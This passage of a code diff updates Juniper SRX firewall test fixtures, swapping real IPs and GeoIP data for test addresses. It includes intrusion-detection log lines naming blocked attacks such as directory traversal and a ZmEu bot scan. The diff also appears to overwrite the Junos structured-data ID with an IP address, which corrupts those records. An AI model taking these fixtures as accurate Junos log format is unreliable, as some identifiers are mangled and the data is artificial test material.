@@ -2410,8 +2321,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066104532Z", - "original": "\u003c14\u003e1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.1.1.1.2.134 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707124300Z", + "original": "\u003c14\u003e1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_deny", @@ -2433,7 +2344,7 @@ "port": 80, "bytes": 646, "packets": 3, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "log": { "level": "informational" 
@@ -2441,24 +2352,24 @@
 "destination": {
 "nat": {
 "port": 80,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.15"
 },
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
 "port": 80,
 "bytes": 646,
- "packets": 3,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.15",
+ "packets": 3
 },
 "rule": {
 "name": "permit-all"
@@ -2466,23 +2377,23 @@
 "source": {
 "nat": {
 "port": 48873,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.14"
 },
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
 "port": 48873,
 "bytes": 392,
- "ip": "81.2.69.193",
+ "ip": "67.43.156.14",
 "user": {
 "name": "user1"
 },
@@ -2532,7 +2443,8 @@
 "user1"
 ],
 "ip": [
- "81.2.69.193"
+ "67.43.156.14",
+ "67.43.156.15"
 ]
 },
 "client": {
@@ -2542,13 +2454,13 @@ "port": 48873, "bytes": 392, "packets": 5, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066106525Z", - "original": "\u003c14\u003e1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.1.1.1.2.129 reason=\"TCP CLIENT RST\" source-address=\"81.2.69.193\" source-port=\"48873\" destination-address=\"81.2.69.193\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"81.2.69.193\" nat-source-port=\"48873\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:13:51.707133700Z", + "original": "\u003c14\u003e1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" 
destination-interface-name=”st0.0” apbr-rule-type=”default”]",
 "kind": "event",
 "start": "2020-01-19T15:18:20.040Z",
 "action": "flow_close",
@@ -2572,7 +2484,7 @@
 "port": 80,
 "bytes": 2132,
 "packets": 34,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.14"
 },
 "log": {
 "level": "informational"
@@ -2580,24 +2492,24 @@
 "destination": {
 "nat": {
 "port": 80,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.14"
 },
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
 "port": 80,
 "bytes": 2132,
- "packets": 34,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.14",
+ "packets": 34
 },
 "rule": {
 "name": "default-permit"
@@ -2652,7 +2564,7 @@
 "related": {
 "ip": [
 "10.1.1.100",
- "81.2.69.193",
+ "67.43.156.14",
 "172.19.34.100"
 ]
 },
@@ -2668,8 +2580,8 @@ "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066119830Z", - "original": "\u003c14\u003e1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address=\"10.1.1.100\" source-port=\"58943\" destination-address=\"81.2.69.193\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"6018\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"80\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"16118\" packets-from-client=\"42\" bytes-from-client=\"2322\" packets-from-server=\"34\" bytes-from-server=\"2132\" elapsed-time=\"60\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" destination-interface-name=\"ge-0/0/0.0\" category=\"N/A\" sub-category=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707143100Z", + "original": "\u003c14\u003e1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"58943\" destination-address=\"67.43.156.14\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"6018\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"80\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"16118\" packets-from-client=\"42\" bytes-from-client=\"2322\" packets-from-server=\"34\" bytes-from-server=\"2132\" elapsed-time=\"60\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" destination-interface-name=\"ge-0/0/0.0\" category=\"N/A\" 
sub-category=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]",
 "kind": "event",
 "start": "2020-07-14T14:17:11.928Z",
 "action": "flow_started",
@@ -2693,7 +2605,7 @@
 "port": 8883,
 "bytes": 9670,
 "packets": 96,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.15"
 },
 "log": {
 "level": "informational"
@@ -2701,24 +2613,24 @@
 "destination": {
 "nat": {
 "port": 8883,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.15"
 },
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": -0.0931,
- "lat": 51.5142
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
 "port": 8883,
 "bytes": 9670,
- "packets": 96,
- "ip": "81.2.69.193"
+ "ip": "67.43.156.15",
+ "packets": 96
 },
 "rule": {
 "name": "default-permit"
@@ -2782,7 +2694,7 @@
 "related": {
 "ip": [
 "10.1.1.100",
- "81.2.69.193",
+ "67.43.156.15",
 "172.19.34.100"
 ]
 },
@@ -2798,8 +2710,8 @@ "event": { "duration": 23755000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066123087Z", - "original": "\u003c14\u003e1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"idle Timeout\" source-address=\"10.1.1.100\" source-port=\"64720\" destination-address=\"81.2.69.193\" destination-port=\"8883\" connection-tag=\"0\" service-name=\"None\" nat-source-address=\"172.19.34.100\" nat-source-port=\"24519\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"8883\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"3851\" packets-from-client=\"161\" bytes-from-client=\"9530\" packets-from-server=\"96\" bytes-from-server=\"9670\" elapsed-time=\"23755\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" secure-web-proxy-session-type=\"NA\" peer-session-id=\"0\" peer-source-address=\"0.0.0.0\" peer-source-port=\"0\" peer-destination-address=\"0.0.0.0\" peer-destination-port=\"0\" hostname=\"NA NA\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707152400Z", + "original": "\u003c14\u003e1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"10.1.1.100\" source-port=\"64720\" destination-address=\"67.43.156.15\" destination-port=\"8883\" connection-tag=\"0\" service-name=\"None\" nat-source-address=\"172.19.34.100\" nat-source-port=\"24519\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"8883\" nat-connection-tag=\"0\" 
src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"3851\" packets-from-client=\"161\" bytes-from-client=\"9530\" packets-from-server=\"96\" bytes-from-server=\"9670\" elapsed-time=\"23755\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" secure-web-proxy-session-type=\"NA\" peer-session-id=\"0\" peer-source-address=\"0.0.0.0\" peer-source-port=\"0\" peer-destination-address=\"0.0.0.0\" peer-destination-port=\"0\" hostname=\"NA NA\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", "start": "2020-07-13T16:43:05.041Z", @@ -2822,7 +2734,7 @@ "port": 53 }, "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2830,28 +2742,22 @@ "destination": { "nat": { "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "rule": { "name": "default-permit" @@ -2904,7 +2810,7 @@ "related": { "ip": [ "10.1.1.100", - "89.160.20.112", + "67.43.156.15", "172.19.34.100" ] }, 
@@ -2917,8 +2823,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066125571Z", - "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.129 source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"89.160.20.112\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707162Z", + "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"67.43.156.15\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" 
encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_started", @@ -2941,7 +2847,7 @@ "port": 53, "bytes": 82, "packets": 1, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2949,29 +2855,23 @@ "destination": { "nat": { "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 53, "bytes": 82, - "ip": "89.160.20.112", + "ip": "67.43.156.15", "packets": 1 }, "rule": { @@ -3031,7 +2931,7 @@ "related": { "ip": [ "10.1.1.100", - "89.160.20.112", + "67.43.156.15", "172.19.34.100" ] }, 
@@ -3047,8 +2947,8 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066127625Z", - "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"89.160.20.112\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707171200Z", + "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" 
session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "kind": "event", "start": "2020-07-13T16:12:05.530Z", "action": "flow_close", diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log index c05d9732fb5..d866cd19a99 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log 
@@ -1,7 +1,7 @@ -<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] -<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] -<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354" 
message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.111.1" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.19.13.11" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] -<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354" message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.30.11" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.16.1.10" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] -<165>1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" 
destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"] -<165>1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth1.O" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] -<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.1.1.1.2.35 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="193.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="172.30.20.201" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] +<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="67.43.156.14" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" 
rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="67.43.156.15" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] +<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="67.43.156.14" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="67.43.156.15" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] +<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1507845354" message-type="SIG" source-address="67.43.156.14" source-port="45610" destination-address="67.43.156.14" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" 
attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.19.13.11" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] +<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1507845354" message-type="SIG" source-address="67.43.156.14" source-port="45610" destination-address="67.43.156.14" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.16.1.10" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] +<165>1 2011-10-23T02:06:26.544 SRX34001 